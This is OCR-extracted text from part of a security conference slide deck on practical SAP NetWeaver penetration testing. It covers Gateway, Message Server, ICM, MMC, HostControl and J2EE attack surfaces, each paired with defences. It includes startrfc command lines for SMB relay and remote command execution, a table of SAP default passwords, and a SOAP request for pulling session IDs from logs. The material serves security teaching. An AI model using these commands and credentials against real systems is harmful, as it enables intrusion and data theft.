• NetWeaver Applica%on Server ABAP – SAP Gateway – SAP Message server
– SAP Message server HTTP – SAP Dispatcher – SAP ICM – SAP MMC – SAP HostControl
• NetWeaver Applica%on Server JAVA – HTTP Server – SAP Portal
58
![Page 59: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/59.jpg)
59
SAP Gateway security
![Page 60: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/60.jpg)
SAP NetWeaver
60
![Page 61: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/61.jpg)
SAP Gateway also called Applica%on Server. • One of the core SAP services • Allows interacAon with remote SAP systems and also with other
systems • Manages the communicaAon for all RFC based funcAonality
– Gateway monitor (AdministraAon ) – Gateway Reader ( RFC) – Gateway work process ( logging )
61
hPp://scn.sap.com/people/maP.kangas/blog/2009/03/03/sap-‐netweaver-‐executables
SAP Gateway
![Page 62: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/62.jpg)
Gateway Monitor
• Gateway Monitor • Access for analyzing gateway process • You can specify 3 opAons for security
– Gw/monitor=0 forbidden access
– Gw/monitor=1 only local access (default now)
– Gw/monitor=2 local and remote access (default before 6.2)
62
![Page 63: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/63.jpg)
Gateway Monitor
• If Gw/monitor=2 it is possible to run criAcal commands and obtain some informaAon remotely
• Remote monitoring can be done by GWMON tool
• Stored in /usr/exe/ • Example: gwmon -‐gwhost 127.0.0.1 -‐gwserv 3200
63
![Page 64: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/64.jpg)
64
DEMO 9: Playing with GWMON
![Page 65: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/65.jpg)
Gateway RFC (3 types)
• ABAP RFC – client call SAP-‐server
• Registered RFC Server Program – Client call addiAonal programs installed on Other servers via Gateway
• Started RFC Server Program
– Client call addiAonal programs that installed on SAP-‐server
65
![Page 66: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/66.jpg)
• Most commonly used • It is like windows RPC • User can call ABAP remote-‐enabled funcAons • need to know:
– System id – Client – userid – password
• There are about 30000 different RFC funcAons in different groups
66
ABAP RFC -‐ overview
![Page 67: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/67.jpg)
ABAP RFC -‐ execu%ng
How to call RFC func%on remotely? • Use default tool \usr\sap\ERP\SYS\exe\run\startrfc
• Use default credenAals or exisAng user credenAals Example:
>Startrfc.exe -3 –h 172.16.0.222 –s 01 –c 800 –F RFC_PING -t
Don’t miss parameters order because you will get errors!
67
![Page 68: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/68.jpg)
ABAP RFC – Anonymous RFC’s
• Check If funcAon can be accessed anonymously • There are some funcAons that can be executed anonymously
– RFC_PING – just check connecAon – RFC_SYSTEM_INFO – RFC_GET_LOCAL_DESTINATIONS – RFC_GET_LOCAL_SERVERS – SYSTEM_INVISIBLE_GUI
68
![Page 69: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/69.jpg)
69
DEMO 10: ABAP RFC – informa)on disclose issues
![Page 70: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/70.jpg)
Default creden%als
They can be used to run RFC funcAons remotely
70
USER PASSWORD Client
SAP* 06071992, PASS 000,001,066,Custom
DDIC 19920706 000,001,Custom
TMSADM PASSWORD, $1Pawd2& 000
SAPCPIC ADMIN 000,001
EARLYWATCH SUPPORT 066
![Page 71: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/71.jpg)
71
DEMO 11: ABAP RFC – user crea)on
![Page 72: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/72.jpg)
ABAP RFC a`acks (SMBRELAY)
• EPS_DELETE_FILE – no addiAonal auth checks inside! • EPS_CLOSE_FILE • CLBA_CLASSIF_FILE_REMOTE_HOST • CLBA_UPDATE_FILE_REMOTE_HOST • EDI_DATA_INCOMMING • RZL_READ_FILE • 50 more….. Example:
>Startrfc.exe -3 –h 172.16.0.222 –s 01 –t -F EDI_DATA_ICOMING –E PATHNAME=\\172.16.0.101\ERPScan\ -E PORT=SAPID3 –u SAPCPIC –p admin
72
![Page 73: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/73.jpg)
• SXPG_CALL_SYSTEM (any command using vulnerability) Example:
Startrfc.exe -‐3 -‐h 172.16.0.222 -‐s 01
-‐F SXPG_COMMAND_EXECUTE -‐E COMMANDNAME=TYPE
-‐E ADDITIONAL_PARAMETERS= cat/etc/passwd
-‐u SAPCPIC -‐p admin
73
ABAP RFC a`acks (Command execu%on)
![Page 74: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/74.jpg)
74
DEMO 12: ABAP RFC – remote command execu)on
![Page 75: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/75.jpg)
Gateway Defense
• Secure GW/monitor • Enable Secinfo and Reginfo ACL (don’t use *) • Patch for latest RFC security bypasses rfc/reg_no_conn • Restrict access to dangerous RFC funcAons • Enable GW/logging
75
![Page 76: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/76.jpg)
76
SAP Message Server security
![Page 77: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/77.jpg)
SAP NetWeaver
77
![Page 78: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/78.jpg)
• The SAP Message server provides two services. – manages SAP communicaAon between the applicaAon servers of one
SAP system. – provides load-‐balancing informaAon to clients like the SAP GUI.
• Before 7.0 listens one port for both services • Since 7.0 default installaAons automaAcally split into
– internal port (used for applicaAon server connecAons) – external port (used for user connecAons).
• This is defined via profile parameters – rdisp/mshost, -‐ host – rdisp/msserv, -‐ port – rdisp/msserv_internal must be !=0
78
SAP Message Server -‐ overview
![Page 79: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/79.jpg)
Why should we make 2 ports for SAP MS? • APacker can register fake applicaAon server on message server
• By default it is possible without authenAcaAon • He can make MITM and sniff client connecAons
79
SAP Message Server -‐ a`acks
![Page 80: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/80.jpg)
SAP Message Server -‐ ACL
• Even if you restrict access to message server from GUI clients • ApplicaAon servers can access it • Ms/acl_info can be used to list approver app servers • The entries must have the following syntax:
HOST=[*| ip_adr | host_name | Subnet_mask | Domain ] [, ...] Examples for valid entries are: HOST = * (all hosts are allowed) HOST=host1,host2 (Logons allowed from host1 and host2) HOST=*.sap.com (all hosts in the sap.com domain can log on) HOST=147.45.56.32 (hosts with this IP address can log on) HOST=147.45.56.* (hosts with this subnet can log on)
80
![Page 81: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/81.jpg)
• SAP Message server Monitoring • Can remotely get informaAon about message server
– check and change all the important se�ngs
– create and view traces – read staAsAcs
• Managed by ms/monitor opAon
• if ms/monitor =1 and ms/admin_port !=0 anybody can get remote access by using “msmon” tool
hPp://help.sap.com/saphelp_nw04/helpdata/EN/64/3e7�4a12e49b9856bb97970c6acc1/frameset.htm
81
Message Server monitoring
![Page 82: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/82.jpg)
82
DEMO 15: Playing with MSMON
![Page 83: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/83.jpg)
• Disable ms/monitor • Enable ms/acl_info and manage ACL
• Enable ms/admin_port
hPp://help.sap.com/saphelp_nw04/helpdata/en/40/c235c15ab7468bb31599cc759179ef/frameset.htm
83
Message server -‐ defense
![Page 84: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/84.jpg)
84
SAP Message Server HTTP
![Page 85: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/85.jpg)
• Message Server HTTP • Just simple HTTP service with informaAon
• There is no need to have this service • InformaAon disclose vulnerability exist:
– Read details about connected instances – Read SAP parameters
85
Message server HTTP -‐ info
![Page 86: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/86.jpg)
86
DEMO 16: Message Server HTTP – parameter disclosure
![Page 87: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/87.jpg)
87
SAP NetWeaver ICM Security
![Page 88: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/88.jpg)
SAP NetWeaver
88
![Page 89: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/89.jpg)
• History of SAP web applicaAons and ITS • ITS vulnerabiliAes • ICM architecture
• ICM vulnerabiliAes • ICM Defense
89
Agenda
![Page 90: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/90.jpg)
More than 1500 services which can execute criAcal funcAonality
• Every registered user can get access to them by default – Most services require authenAcaAon – You can use any of defaults to aPack – By default all ICF services are not assigned to any AuthorizaAon value – ANY user can execute any ICF service (If there is no addiAonal auth checks in code )
– There are many criAcal services which can be used by unprivileged user to escalate privileges
• Also there are about 40 anonymous services (TransacAon SICF)
90
ICM (Cri%cal services)
![Page 91: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/91.jpg)
Some examples of RFC funcAons:
• /sap/public/info anonymous info about system
• /sap/public/icf_info/icr_groups installed applicaAons
• /sap/bc/soap/rfc remote RRF calls
• /sap/bc/srt/xip/sap criAcal XI funcAons
• /sap/bw/Bex reading infoobjects remotely
• /sap/bc/bsp/sap/htmlb_samples test service with vulnerabiliAes
• /sap/bc/gui/sap/its/webgui webgui access
91
ICM (List of cri%cal services)
![Page 92: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/92.jpg)
• Service /sap/public/info -‐ anonymous info about system
• Can be called anonymously without having user rights
92
ICM (Cri%cal services)
![Page 93: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/93.jpg)
• Service /sap/public/icf_info/icr_urlprefix installed applicaAons
93
ICM (Cri%cal services)
![Page 94: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/94.jpg)
94
DEMO 17: ITS Infdisclose by ERPScan Pentes)ng Tool
![Page 95: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/95.jpg)
They can be used to run RFC funcAons remotely
95
USER PASSWORD Client
SAP* 06071992, PASS 000,001,066,Custom
DDIC 19920706 000,001,Custom
TMSADM PASSWORD, $1Pawd2& 000
SAPCPIC ADMIN 000,001
EARLYWATCH SUPPORT 066
Default creden%als
![Page 96: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/96.jpg)
• CriAcal service sap/bc/soap/rfc • RFC funcAons are mapped to RFC authorizaAon groups
• Security of standard SOAP RFC calls – User must have S_RFC authorizaAon to group of RFC funcAons to
execute any call in this group
– User must have authorizaAons which are defined inside RFC funcAon to execute this funcAon
– Many RFC funcAons don’t have any special authorizaAon checks so every user can call them by SOAP RFC
96
ICM (Cri%cal services)
![Page 97: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/97.jpg)
97
DEMO 18: SOAP RFC’s by ERPScan Pentes)ng Tool
![Page 98: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/98.jpg)
ICM Service Defense: other
• Disable or configure customized HTTP server header for ICM (sap note 1329326)
• Disable or configure disclosure of hidden version (sap note 747818) • Disable services that are not necessary (note 1498575) • Configure ICF authorizaAon for enabled services • Change default passwords
98
![Page 99: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/99.jpg)
99
SAP Management Console security
![Page 100: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/100.jpg)
SAP NetWeaver
100
MMC Service
SAPHostcontrol
![Page 101: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/101.jpg)
• MMC is installed by default on port 5<ID>13 • Used for remote management of SAP servers • Command executed via SOAP interface • By default SSL is not implemented • AdministraAon password transmiPed using basic auth (base64) • By sniffing this password we can get full control over the server
101
SAP MMC -‐ overview
![Page 102: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/102.jpg)
• Many aPacks can be implemented without authenAcaAon • APacks can be realized by sending SOAP requests • Mostly it is informaAon disclose and denial of service
• Also OS command execuAon • All MMC aPacks are implemented in ERPScan PentesAng Tool
102
SAP MMC a`acks
![Page 103: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/103.jpg)
ERPScan PentesAng Tool modules • GET_VERSION_gSOAP.pl
– Obtaining version of SAP NetWeaver
• GET_ENV_gSOAP.pl – Obtaining list of SAP parameters
• LIST_LOGS_gSOAP.pl – Show the list of log files that can be obtained
• LIST_TRACE_gSOAP.pl
103
SAP MMC a`acks
![Page 104: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/104.jpg)
SAP MMC a`acks
– Show the list of Trace files that can be obtained remotely
• GET_LOGS_gSOAP.pl – Sow log file details
• GET_TRACE_gSOAP.pl – Show trace file details
104
![Page 105: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/105.jpg)
Advanced MMC A`acks
• SAP MMC provides a common framework for centralized system management
• Allowing to see the trace and log messages • File userinterface.log can store JSESSIONID is trace is ON • Using JSESSIONID from logs, aPacker can log into SAP Portal
105
![Page 106: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/106.jpg)
Advanced MMC A`acks
<?xml version="1.0"?>!<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/
envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xs="http://www.w3.org/2001/XMLSchema">!
<SOAP-ENV:Header>! <sapsess:Session xmlns:sapsess="http://www.sap.com/webas/630/soap/
features/session/">! <enableSession>true</enableSession>!</sapsess:Session>!</SOAP-ENV:Header>!<SOAP-ENV:Body>! <ns1:ReadLogFile xmlns:ns1="urn:SAPControl">! <filename>j2ee/cluster/server0/log/system/userinterface.log</
filename>! <filter/>! <language/>! <maxentries>%COUNT%</maxentries>! <statecookie>EOF</statecookie>! </ns1:ReadLogFile>!</SOAP-ENV:Body>!</SOAP-ENV:Envelope>!
106
![Page 107: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/107.jpg)
107
DEMO 19: SAP MMC adacks by ERPScan Pentes)ng Tool
![Page 108: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/108.jpg)
SAP MMC-‐ defense
• Install Sapnote 927637 • Install Sapnote 1439348 – informaAon disclosure in MMC
• Install Sapnote 1469804 -‐ PotenAal DOS in sapstartsrv • Don’t use TRACE_LEVEL = 3 in producAon systems • Delete traces • Disable methods service/protectedwebmethods = SDEFAULT
• Disable access from untusted IP’s – service/h`p/acl_file – service/h`ps/acl_file
hPp://help.sap.com/saphelp_nwpi71/helpdata/en/d6/49543b1e49bc1fe10000000a114084/frameset.htm
108
![Page 109: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/109.jpg)
109
SAP HostControl security
![Page 110: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/110.jpg)
SAP NetWeaver
110
MMC Service
SAPHostcontrol
![Page 111: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/111.jpg)
SAPHostControl
• Service listens on port 1128/tcp. • Very similar to MMC
• Many aPacks can be implemented without authenAcaAon
• APacks can be realized by sending SOAP requests • Vulnerability in the GetDataBaseStatus functon • Parameters are passed to dbmcli executable
• SAP MaxDB only
111
![Page 112: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/112.jpg)
112
DEMO 21: SAP HostControl command injec)on by
ERPScan Pentes)ng Tool
![Page 113: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/113.jpg)
Defense
• Install Sapnote 1341333 -‐ command injecAon • Disable access from untusted IP’s
113
![Page 114: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/114.jpg)
114
SAP NetWeaver J2EE security
![Page 115: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/115.jpg)
SAP NetWeaver
115
![Page 116: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/116.jpg)
J2EE Engine
• AutomaAon of business processes like ERP, PLM, CRM, SRM based ABAP.
• IntegraAon, collaboraAon and management based on J2ee engine: – SAP Portal – SAP PI – SAP XI – SAP Mobile Infrastructure – SAP Solu%on Manager
116
Many SAP systems don’t use ABAP stack
![Page 117: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/117.jpg)
J2EE Plamorm Architecture
117
![Page 118: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/118.jpg)
J2EE Plamorm services
118
Service Name Port Number Default Value Range (min-‐max)
Enqueue server 32NN 3201 3200-‐3299 HTTP 5NN00 50000 50000-‐59900
HTTP over SSL 5NN01 50001 50001-‐59901
IIOP 5NN07 50007 50007-‐59907
IIOP IniAal Context 5NN02 50002 50002-‐59902
IIOP over SSL 5NN03 50003 50003-‐59903
P4 5NN04 50004 50004-‐59904
P4 over HTTP 5NN05 50005 50005-‐59905
P4 over SSL 5NN06 50006 50006-‐59906
Telnet 5NN08 50008 50008-‐59908
LogViewer control 5NN09 50009 50009-‐59909
JMS 5NN10 50010 50010-‐59910
![Page 119: Prac%cal’SAP’ Pentesng · 2016-12-30 · Invest’in’security’ to’secure’investments’ Prac%cal’SAP’ Pentesng! Alexander!Polyakov.CTO ERPScan!](https://reader035.fdocuments.net/reader035/viewer/2022070917/5fb73094ebcf5432554158f7/html5/thumbnails/119.jpg)
SAP J2EE Services
• General services – SAP Visual Admin (P4) – SAP NetWeaver HTTP (webserver)
